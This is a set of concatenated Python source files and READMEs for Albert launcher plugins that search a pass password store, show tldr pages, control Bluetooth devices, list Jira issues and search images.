def do_notify(msg: str, image=None):
app_name = "pass_rlded"
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def generate_passwd_cmd(passwd_name: str) -> str:
return f"pass generate -c -f {passwd_name}"
def generate_passwd_cmd_li(passwd_name: str) -> Sequence[str]:
return f"pass generate -c -f {passwd_name}".split()
# supplementary functions ---------------------------------------------------------------------
def get_as_item(query, password_path: Path):
full_path_no_suffix = Path(f"{password_path.parent}/{password_path.stem}")
full_path_rel_root = full_path_no_suffix.relative_to(pass_dir)
full_path_rel_root_str = str(full_path_rel_root)
actions = [
ProcAction("Remove", ["pass", "rm", "--force", full_path_rel_root_str]),
ClipAction("Copy Full Path", str(password_path)),
ClipAction("Copy Password name", password_path.name),
ClipAction("Copy pass-compatible path", full_path_rel_root_str),
]
actions.insert(0, ProcAction("Edit", ["pass", "edit", full_path_rel_root_str]))
actions.insert(
0,
ProcAction("Copy", ["pass", "--clip", full_path_rel_root_str]),
)
if pass_open_doc_compatible(password_path):
actions.insert(
0,
FuncAction(
"Open document with pass-open-doc",
lambda p=str(password_path): subprocess.run(["pass-open-doc", p], check=True),
),
)
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{password_path.stem}",
subtext=full_path_rel_root_str,
completion=f"{query.trigger}{full_path_rel_root_str}",
actions=actions,
)
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name: str) -> Sequence[str]:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
return [s.strip() for s in f.readlines()]
def data_exists(data_name: str) -> bool:
return (config_path / data_name).is_file()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class ProcAction(v0.Action):
def __init__(self, name, args):
super().__init__(name, name, lambda: v0.runDetachedProcess(args))
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "pass "
def synopsis(self):
return "pass name"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
query_str = query.string.strip()
if len(query_str) == 0:
passwords_cache.refresh = True
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Continue typing to fuzzy-search on passwords...",
actions=[],
)
)
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Generate a new password...",
completion=f"{query.trigger}generate",
actions=[],
)
)
if query_str.startswith("generate"):
                if len(query_str.split()) > 1:
passwd_name = " ".join(query_str.split()[1:])
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Generate new password",
subtext=generate_passwd_cmd(passwd_name),
completion=f"{query.trigger}{query_str}",
actions=[
ProcAction(
"Generate new password",
generate_passwd_cmd_li(passwd_name=passwd_name),
)
],
),
)
else:
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="What's the path of this new password?",
subtext="e.g., awesome-e-shop/<EMAIL>",
completion=f"{query.trigger} generate",
actions=[],
)
)
# get a list of all the paths under pass_dir
gpg_files = passwords_cache.get_all_gpg_files()
# fuzzy search on the paths list
matched = process.extract(query_str, gpg_files, limit=10)
for m in [elem[0] for elem in matched]:
results.append(get_as_item(query, m))
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{sys.exc_info()}",
)
],
),
)
query.add(results)
<file_sep>"""TL;DR pages from albert."""
import re
import subprocess
import traceback
from pathlib import Path
from typing import Dict, Optional, Tuple
from fuzzywuzzy import process
import albert as v0
md_name = "TL;DR pages from albert."
md_description = "View tldr pages from inside albert"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//tldr_pages"
)
icon_path = str(Path(__file__).parent / "tldr_pages")
cache_path = Path(v0.cacheLocation()) / "tldr_pages"
config_path = Path(v0.configLocation()) / "tldr_pages"
data_path = Path(v0.dataLocation()) / "tldr_pages"
tldr_root = cache_path / "tldr"
pages_root = tldr_root / "pages"
page_paths: Dict[str, Path] = {}
# Is the plugin run in development mode?
in_development = False
# plugin main functions -----------------------------------------------------------------------
def reindex_tldr_pages():
global page_paths
page_paths = get_page_paths()
# supplementary functions ---------------------------------------------------------------------
def update_tldr_db():
subprocess.check_call(f"git -C {tldr_root} pull --rebase origin master".split())
reindex_tldr_pages()
def get_page_paths() -> Dict[str, Path]:
    paths = list(pages_root.rglob("*.md"))
    return {p.stem: p for p in paths}
def get_cmd_as_item(query, pair: Tuple[str, Path]):
with open(pair[-1], "r") as f:
all_lines = f.readlines()
description_lines = [
li.lstrip("> ").rstrip().rstrip(".") for li in all_lines if li.startswith("> ")
]
# see if there's a line with more information and a URL
more_info_url = None
try:
more_info = [li for li in all_lines if "more information" in li.lower()][0]
more_info_url = re.search("<(.*)>", more_info)
if more_info_url is not None and more_info_url.groups():
more_info_url = more_info_url.groups()[0]
except IndexError:
pass
actions = [
ClipAction("Copy command", pair[0]),
UrlAction(
"Do a google search", f'https://www.google.com/search?q="{pair[0]}" command'
),
]
if more_info_url:
actions.append(UrlAction("More information", more_info_url))
return v0.Item(
id=md_name,
icon=[icon_path],
text=pair[0],
completion=" ".join([query.trigger, pair[0]]),
subtext=" ".join(description_lines),
actions=actions,
)
def get_cmd_sanitized(s: str) -> str:
return sanitize_string(s.strip("`").replace("{{", "").replace("}}", ""))
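# get_cmd_items below parses the standard tldr page layout, which looks roughly like:
#
#   # command
#   > Short description.
#   > More information: <https://example.com>.
#
#   - Example description:
#
#   `command --flag {{argument}}`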
def get_cmd_items(pair: Tuple[str, Path]):
"""Return a list of Albert items - one per example."""
with open(pair[-1], "r") as f:
lines = [li.strip() for li in f.readlines()]
items = []
i = 0
if len(lines) < 2:
return items
while i < len(lines):
li = lines[i]
if not li.startswith("- "):
i += 1
continue
desc = li.lstrip("- ")[:-1]
# Support multine commands ------------------------------------------------------------
#
# find the start of the example - parse it differently if it's a single quote or if
# it's a multiline one
i += 2
example_line_start = lines[i]
if example_line_start.startswith("```"):
# multi-line string, find end
j = i + 1
while j < len(lines) and lines[j] != "```":
j += 1
example_cmd = get_cmd_sanitized("\n".join(lines[i + 1 : j]))
i = j
else:
example_cmd = get_cmd_sanitized(lines[i])
items.append(
v0.Item(
id=md_name,
icon=[icon_path],
text=example_cmd,
subtext=desc,
actions=[
ClipAction("Copy command", example_cmd),
UrlAction(
"Do a google search",
f'https://www.google.com/search?q="{pair[0]}" command',
),
],
)
)
i += 1
return items
def sanitize_string(s: str) -> str:
    return s.replace("<", "<")
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "tldr "
def synopsis(self):
return "some command"
def finalize(self):
pass
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
global page_paths
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
if not pages_root.is_dir():
subprocess.check_call(
f"git clone https://github.com/tldr-pages/tldr {tldr_root}".split()
)
reindex_tldr_pages()
def handleQuery(self, query) -> None:
results = []
try:
query_text = query.string.strip()
if not len(query_text):
results = [
v0.Item(
id=md_name,
icon=[icon_path],
text="Update tldr database",
actions=[FuncAction("Update", lambda: update_tldr_db())],
),
v0.Item(
id=md_name,
icon=[icon_path],
text="Reindex tldr pages",
actions=[FuncAction("Reindex", lambda: reindex_tldr_pages())],
),
v0.Item(
id=md_name,
icon=[icon_path],
text="Need at least 1 letter to offer suggestions",
actions=[],
),
]
query.add(results)
return
if query_text in page_paths.keys():
# exact match - show examples
results.extend(get_cmd_items((query_text, page_paths[query_text])))
else:
# fuzzy search based on word
matched = process.extract(query_text, page_paths.keys(), limit=20)
for m in [elem[0] for elem in matched]:
results.append(get_cmd_as_item(query, (m, page_paths[m])))
except Exception: # user to report error
v0.critical(traceback.format_exc())
if in_development:
raise
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""Interact with the Linux bluetooth resources."""
import subprocess
import threading
import traceback
from pathlib import Path
from typing import List, Mapping, MutableMapping, Optional, Sequence
import gi
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import Notify
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "Bluetooth - Connect / Disconnect bluetooth devices"
md_description = "Connect / Disconnect bluetooth devices"
md_license = "BSD-2"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/bluetooth"
md_maintainers = "<NAME>"
md_bin_dependencies = ["rfkill", "bluetoothctl"]
icon_path = str(Path(__file__).parent / "bluetooth-orig.png")
icon_error_path = str(Path(__file__).parent / "bluetooth1.svg")
cache_path = Path(cacheLocation()) / "bluetooth"
config_path = Path(configLocation()) / "bluetooth"
data_path = Path(dataLocation()) / "bluetooth"
workers: List[threading.Thread] = []
class BlDevice:
"""Represent a single bluetooth device."""
def __init__(self, mac_address: str, name: str):
self.mac_address = mac_address
self.name = name
d = self._parse_info()
self.is_paired = d["Paired"] == "yes"
self.is_trusted = d["Trusted"] == "yes"
self.is_blocked = d["Blocked"] == "yes"
self.is_connected = d["Connected"] == "yes"
self.icon = d.get("Icon", icon_path)
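    # `bluetoothctl info <mac>` prints "Key: value" lines such as:
    #   Paired: yes
    #   Trusted: yes
    #   Blocked: no
    #   Connected: no
    #   Icon: audio-headset
    # which _parse_info below turns into a dict.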
def _parse_info(self) -> Mapping[str, str]:
proc = bl_cmd(["info", self.mac_address])
lines = [li.decode("utf-8").strip() for li in proc.stdout.splitlines()][1:]
d: MutableMapping[str, str] = {}
for li in lines:
try:
key, val = li.split(": ")
except ValueError:
# ill-formatted key
continue
d[key] = val
return d
def trust(self) -> None:
"""Trust a device."""
async_bl_cmd(["trust", self.mac_address])
def pair(self) -> None:
"""Pair with a device."""
async_bl_cmd(["pair", self.mac_address])
def connect(self) -> None:
"""Conect to a device."""
async_bl_cmd(["connect", self.mac_address])
def disconnect(self) -> None:
"""Disconnect an already connected device."""
async_bl_cmd(["disconnect", self.mac_address])
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class FuncAction(Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def initialize(self):
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def defaultTrigger(self):
return "bl "
def handleQuery(self, query):
if not query.isValid:
return
results = []
# join any previously launched threads
        while workers:
            workers.pop().join(2)
try:
# List all available device
results.extend(self.get_device_as_item(dev) for dev in list_avail_devices())
# append items to turn on / off the wifi altogether
results.append(
self.get_shell_cmd_as_item(
text="Enable bluetooth",
command="rfkill unblock bluetooth",
)
)
results.append(
self.get_shell_cmd_as_item(
text="Disable bluetooth",
command="rfkill block bluetooth",
)
)
except Exception: # user to report error
critical(traceback.format_exc())
query.add(Item(
id=self.name(),
                icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
def get_device_as_item(self, dev: BlDevice):
text = dev.name
subtext = (
f"pair: {dev.is_paired} | "
f"connect: {dev.is_connected} | "
f"trust: {dev.is_trusted} | "
f"mac: {dev.mac_address}"
)
actions = []
if dev.is_connected:
actions.append(FuncAction("Disconnect device", lambda dev=dev: dev.disconnect()))
else:
actions.append(FuncAction("Connect device", lambda dev=dev: dev.connect()))
if not dev.is_trusted:
actions.append(FuncAction("Trust device", lambda dev=dev: dev.trust()))
if not dev.is_paired:
actions.append(FuncAction("Pair device", lambda dev=dev: dev.pair()))
actions.append(ClipAction("Copy device's MAC address", dev.mac_address))
icon = lookup_icon(dev.icon) or icon_path
return Item(
id=self.name(),
icon=[icon],
text=text,
subtext=subtext,
completion=self.defaultTrigger(),
actions=actions,
)
def get_shell_cmd_as_item(self, *, text: str, command: str):
"""Return shell command as an item - ready to be appended to the items list and be rendered by Albert."""
subtext = ""
completion = self.defaultTrigger()
def run(command: str):
proc = subprocess.run(command.split(" "), capture_output=True, check=False)
if proc.returncode != 0:
stdout = proc.stdout.decode("utf-8").strip()
stderr = proc.stderr.decode("utf-8").strip()
notify(
msg=f"Error when executing {command}\n\nstdout: {stdout}\n\nstderr: {stderr}",
image=icon_error_path,
)
return Item(
id=self.name(),
icon=[icon_path],
text=text,
subtext=subtext,
completion=completion,
actions=[
FuncAction(text, lambda command=command: run(command=command)),
],
)
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def async_bl_cmd(cmd: Sequence[str]):
"""
Run a bluetoothctl-wrapped command in the background.
Inform about the result using system nofications.
"""
def _async_bl_cmd():
info("Running async bluetoothctl command - {cmd}")
proc = bl_cmd(cmd=cmd)
if proc.returncode == 0:
notify(
msg=f"Command {cmd} exited successfully.",
)
else:
msg = f"Command {cmd} failed - " f"{proc.returncode}"
stdout = proc.stdout.decode("utf-8").strip()
stderr = proc.stderr.decode("utf-8").strip()
if stdout:
msg += f"\n\nSTDOUT:\n\n{proc.stdout}"
if stderr:
msg += f"\n\nSTDERR:\n\n{proc.stderr}"
notify(msg=msg, image=icon_error_path)
t = threading.Thread(target=_async_bl_cmd)
t.start()
workers.append(t)
# BlDevice class ------------------------------------------------------------------------------
def bl_cmd(cmd: Sequence[str], check: bool = False) -> subprocess.CompletedProcess:
"""Run a bluetoothctl-wrapped command."""
return subprocess.run(["bluetoothctl", *cmd], check=check, capture_output=True)
def _bl_devices_cmd(cmd: Sequence[str]) -> Sequence[BlDevice]:
"""Run a command via bluetoothct and parse assuming it returns a Device-per-line output."""
proc = bl_cmd(cmd)
lines = [li.decode("utf-8").strip() for li in proc.stdout.splitlines()]
bl_devices = []
for li in lines:
        tokens = li.strip().split()
        # device names may contain spaces - keep everything after the MAC address
        bl_devices.append(BlDevice(mac_address=tokens[1], name=" ".join(tokens[2:])))
return bl_devices
def list_paired_devices() -> Sequence[BlDevice]:
return _bl_devices_cmd(["paired-devices"])
def list_avail_devices() -> Sequence[BlDevice]:
return _bl_devices_cmd(["devices"])
# supplementary functions ---------------------------------------------------------------------
def sanitize_string(s: str) -> str:
    return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def lookup_icon(icon_name: str) -> Optional[str]:
icons = list(Path(__file__).parent.glob("*.png"))
matching = [icon for icon in icons if icon_name in icon.name]
if matching:
return str(matching[0])
else:
return None
<file_sep># colors - Albert plugin
## Description
The current plugin can be used for the following
* Visualise a given color name / hex code. It additionally provides the hex code
  in either 6- or 12-byte format, as well as the corresponding RGB triplets
* Use fuzzy search to find the colors that match your search string or
  given hex code
## Demo


## Installation instructions
* Install the colors library from pip: `pip3 install --user --upgrade colour`
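The plugin builds on the `colour` package; here's a minimal sketch of the
conversions it performs (the color name below is just an example):

```python
from colour import Color

c = Color("red")
print(c.hex)    # short hex code -> "#f00"
print(c.hex_l)  # long hex code  -> "#ff0000"
print(c.rgb)    # RGB triplet    -> (1.0, 0.0, 0.0)
```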
Refer to the parent project for further instructions: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>""" Jira Issue Tracking."""
import os
import shutil
import subprocess
import traceback
from pathlib import Path
from typing import cast
from fuzzywuzzy import process
from jira import JIRA, resources
from jira.client import ResultList
import albert as v0
# initial configuration -----------------------------------------------------------------------
md_name = "Jira"
md_description = "Jira Issue Tracking"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/jira-albert-plugin"
__simplename__ = "jira"
md_bin_dependencies = []
icon_path = os.path.join(os.path.dirname(__file__), "jira_blue")
icon_path_br = os.path.join(os.path.dirname(__file__), "jira_bold_red")
icon_path_r = os.path.join(os.path.dirname(__file__), "jira_red")
icon_path_y = os.path.join(os.path.dirname(__file__), "jira_yellow")
icon_path_g = os.path.join(os.path.dirname(__file__), "jira_green")
icon_path_lg = os.path.join(os.path.dirname(__file__), "jira_light_green")
# plugin locations
cache_path = Path(v0.cacheLocation()) / __simplename__
config_path = Path(v0.configLocation()) / __simplename__
data_path = Path(v0.dataLocation()) / __simplename__
pass_path = Path().home() / ".password-store"
user_path = config_path / "user"
server_path = config_path / "server"
api_key_path = pass_path / "jira-albert-plugin" / "api-key.gpg"
max_results_to_request = 50
max_results_to_show = 5
fields_to_include = ["assignee", "issuetype", "priority", "project", "status", "summary"]
prio_to_icon = {
"Highest": icon_path_br,
"High": icon_path_r,
"Medium": icon_path_y,
"Low": icon_path_g,
"Lowest": icon_path_lg,
}
prio_to_text = {"Highest": "↑", "High": "↗", "Medium": "-", "Low": "↘", "Lowest": "↓"}
# supplementary functions ---------------------------------------------------------------------
def get_create_issue_page(server: str) -> str:
return server + "/secure/CreateIssue!default.jspa"
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
def load_api_key() -> str:
try:
ret = subprocess.run(
["gpg", "--decrypt", api_key_path],
timeout=2,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
api_key = ret.stdout.decode("utf-8").strip()
return api_key
except subprocess.TimeoutExpired as exc:
exc.output = "\n 'gpg --decrypt' was killed after timeout.\n"
raise
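# The API key is read from the pass entry jira-albert-plugin/api-key - store it
# beforehand with: pass insert jira-albert-plugin/api-key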
def setup(query) -> bool:
if not shutil.which("pass"):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text='"pass" is not installed.',
subtext='Please install and configure "pass" accordingly.',
actions=[UrlAction('Open "pass" website', "https://www.passwordstore.org/")],
)
)
        return True
# user
if not user_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please specify your email address for JIRA",
subtext="Fill and press [ENTER]",
actions=[FuncAction("Save user", lambda: save_data(query.string, "user"))],
)
)
        return True
# jira server
if not server_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please specify the JIRA server to connect to",
subtext="Fill and press [ENTER]",
actions=[
FuncAction("Save JIRA server", lambda: save_data(query.string, "server"))
],
)
)
        return True
# api_key
if not api_key_path.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Please add api_key",
subtext="Press to copy the command to run",
actions=[
ClipAction(
"Copy command",
(
"pass insert"
f" {api_key_path.relative_to(pass_path).parent / api_key_path.stem}"
),
)
],
)
)
        return True
    return False
def get_as_subtext_field(field, field_title=None):
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}:" + s
return s
def make_transition(jira, issue, a_transition_id):
print(f'Transitioning issue "{issue.fields.summary[:10]}" -> {a_transition_id}')
jira.transition_issue(issue, a_transition_id)
def get_as_item(issue: resources.Issue, jira):
field = get_as_subtext_field
# first action is default action
actions = [
UrlAction("Open in jira", f"{issue.permalink()}"),
ClipAction("Copy jira URL", f"{issue.permalink()}"),
]
# add an action for each one of the available transitions
curr_status = issue.fields.status.name
for a_transition in jira.transitions(issue):
if a_transition["name"] != curr_status:
actions.append(
FuncAction(
f'Mark as "{a_transition["name"]}"',
lambda a_transition_id=a_transition["id"]: make_transition(
jira, issue, a_transition_id
),
)
)
subtext = (
f"{field(issue.fields.assignee)}"
f"{field(issue.fields.status.name)}"
f"{field(issue.fields.issuetype.name)}"
f"{field(issue.fields.project.key, 'proj')}"
)
subtext += prio_to_text[issue.fields.priority.name]
return v0.Item(
id=f"{md_name}_{issue.fields.priority.name}",
icon=[prio_to_icon[issue.fields.priority.name]],
text=issue.fields.summary,
subtext=subtext,
actions=actions,
)
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "jira "
def synopsis(self):
return "ticket title/expr"
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
results_setup = setup(query)
if results_setup:
                return
# TODO Only send request if query ends with dot otherwise add an item to inform the
# user of this behavior accordingly
user = load_data("user")
server = load_data("server")
api_key = load_api_key()
# connect to JIRA
jira = JIRA(server=server, basic_auth=(user, api_key))
issues = cast(
ResultList,
jira.search_issues(
(
"assignee = currentUser() AND status != 'Done' AND status != 'Won\\'t"
" do' AND status != 'Resolved' AND status != 'Rejected'"
),
maxResults=max_results_to_request,
fields=",".join(fields_to_include),
json_result=False,
),
)
issues.sort(key=lambda issue: issue.fields.priority.id, reverse=False)
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text="Create new issue",
actions=[UrlAction("Create new issue", get_create_issue_page(server))],
)
)
if len(query.string.strip()) <= 2:
for issue in issues[:max_results_to_show]:
results.append(get_as_item(issue, jira))
else:
desc_to_issue = {issue.fields.summary: issue for issue in issues}
# do fuzzy search - show relevant issues
matched = process.extract(
query.string.strip(), list(desc_to_issue.keys()), limit=5
)
for m in [elem[0] for elem in matched]:
results.append(get_as_item(desc_to_issue[m], jira))
except Exception: # user to report error
v0.critical(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep># url_lookup - Albert plugin
## Description

Lookup URL error codes and get information on them.
## Demo

## Manual installation instructions
Requirements:
- Albert - [Installation instructions](https://albertlauncher.github.io/docs/installing/)
- Albert Python Interface: ``v0.4``
- Python version >= 3.5
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep># `Anki` - Albert plugin
## Description
`Anki` card generator: Generate Basic, Basic-Reverse and Cloze cards for [Anki](https://apps.ankiweb.net/)
## Demo
### Usage demo

### User Interface

## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
You need to have the [AnkiConnect](https://ankiweb.net/shared/info/2055492159)
plugin installed.
### Imports
You also need the following imports to work:
- `import httpx`
- `from fuzzywuzzy import process`
- `from gi.repository import GdkPixbuf, Notify`
- `from overrides import overrides`
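A minimal sketch of the kind of request the plugin sends to AnkiConnect via
`httpx` (endpoint and deck/model names below are AnkiConnect's defaults; the
card content is made up):

```python
import httpx

resp = httpx.post(
    "http://localhost:8765",
    json={
        "action": "addNote",
        "version": 6,
        "params": {
            "note": {
                "deckName": "Default",
                "modelName": "Basic",
                "fields": {"Front": "What is Albert?", "Back": "A keyboard launcher"},
            }
        },
    },
)
resp.raise_for_status()
print(resp.json())  # {"result": <new note id>, "error": None}
```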
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues)
for the things that I'm currently either working on or interested in
implementing in the near future. In case there's something you are interested
in working on, don't hesitate to either ask for clarifications or just do it and
directly make a PR.
<file_sep>"""Image Search and Preview."""
import concurrent.futures
import importlib.util
import subprocess
import time
import traceback
from pathlib import Path
from typing import Iterator, List
import albert as v0
import gi  # isort:skip

gi.require_version("Notify", "0.7")  # isort:skip
gi.require_version("GdkPixbuf", "2.0")  # isort:skip
from gi.repository import GdkPixbuf, Notify  # isort:skip
# load bing module - from the same directory as this file
dir_ = Path(__file__).absolute().parent
spec = importlib.util.spec_from_file_location("bing", dir_ / "bing.py")
if spec is None:
raise RuntimeError("Couldn't find bing.py in current dir.")
bing = importlib.util.module_from_spec(spec)
spec.loader.exec_module(bing) # type: ignore
BingImage = bing.BingImage # type: ignore
bing_search = bing.bing_search # type: ignore
md_name = "Image Search and Preview"
md_description = "TODO"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/image_search"
)
icon_path = str(Path(__file__).parent / "image_search")
cache_path = Path(v0.cacheLocation()) / "image_search"
config_path = Path(v0.configLocation()) / "image_search"
data_path = Path(v0.dataLocation()) / "image_search"
# clean up cached images on every startup
if cache_path.exists():
for img in cache_path.glob("*"):
img.unlink()
# Keystroke Monitor ---------------------------------------------------------------------------
class KeystrokeMonitor:
def __init__(self):
super(KeystrokeMonitor, self)
self.thres = 0.4 # s
self.prev_time = time.time()
self.curr_time = time.time()
def report(self):
self.prev_time = time.time()
self.curr_time = time.time()
self.report = self.report_after_first # type: ignore
def report_after_first(self):
# update prev, curr time
self.prev_time = self.curr_time
self.curr_time = time.time()
def triggered(self) -> bool:
return self.curr_time - self.prev_time > self.thres
def reset(self) -> None:
self.report = self.report_after_first # type: ignore
# Do not flood the web server with queries, otherwise it may block your IP.
keys_monitor = KeystrokeMonitor()
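# Usage sketch: report() is called on every keypress, and the expensive web
# request only fires once triggered() - i.e. once the user has paused typing
# for more than `thres` seconds (see handleQuery below).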
# supplementary functions ---------------------------------------------------------------------
def bing_search_set_download(query, limit) -> Iterator[BingImage]:
for img in bing_search(query=query, limit=limit):
img.download_dir = cache_path
yield img
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def copy_image(result: BingImage):
fname_in = result.image.absolute()
if result.type == "png":
fname_out = fname_in
else:
fname_out = f"{result.image.absolute()}.png"
subprocess.check_call(["convert", "-format", "png", fname_in, fname_out])
subprocess.check_call(["xclip", "-selection", "clipboard", "-t", "image/png", fname_out])
def sanitize_string(s: str) -> str:
    return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
